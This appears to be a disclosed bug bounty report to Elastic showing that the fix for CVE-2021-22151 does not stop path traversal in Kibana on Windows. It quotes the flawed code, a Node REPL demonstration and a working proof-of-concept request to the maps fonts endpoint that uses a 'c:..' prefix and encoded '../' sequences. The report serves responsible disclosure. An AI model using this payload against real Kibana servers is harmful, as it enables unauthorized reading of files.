Dee-seeH1:1353603Elastic: Fix for CVE-2021-22151 (Kibana path traversal issue) can be bypassed on Windows
0.0005 Low
EPSS
Percentile
16.4%
Summary
Hello team, I hope you’re doing well! I was combing through your GitHub repository to look at the fixes for recent security releases and found the fix for CVE-2021-22151 to be incomplete. The current fix makes assumptions that are true on Linux but that don’t hold on Windows.
Details
The fixed code looks like this
const range = path.normalize(request.params.range);
return range.startsWith('..')
? response.notFound()
: new Promise((resolve) => {
const fontPath = path.join(__dirname, 'fonts', 'open_sans', `${range}.pbf`);
fs.readFile(fontPath, (error, data) => {
// snipped
});
});
The assumption is that any path traversal attempts, once normalized, will start with ... This seems to hold on Linux, however on Windows this can happen (using the NodeJS REPL for demonstration here):
> let range = path.normalize('c:../../../../../../../path_traversal')
undefined
> console.log(range)
c:..\..\..\..\..\..\..\path_traversal
> range.startsWith('..')
false
> const fontPath = path.join(__dirname, 'fonts', 'open_sans', `${range}.pbf`);
undefined
> console.log(fontPath)
c:\path_traversal.pbf
Path traversal happened even if the range didn’t start with ...
Steps to reproduce
This requires Kibana to be installed on Windows.
- Put a
.pbffile somewhere on disk for demonstration. I did it withecho hax > c:\path_traversal.pbf - Visit <http://localhost:5601/api/maps/fonts/open_sans/c%3A..%2F..%2F..%2F..%2F..%2F..%2F..%2Fpath_traversal> and the file from the previous step will be downloaded
- You might need to add some
..%2fdepending on how deep Kibana is installed.
- You might need to add some
Remediation
Thom Heymann already had a great suggestion in their code review
> The best way to solve this is to resolve the path from range and ensure it is inside your fonts directory.
I think this would fix the issue once and for all!
Impact
Path traversal disclosing .pbf files
Related
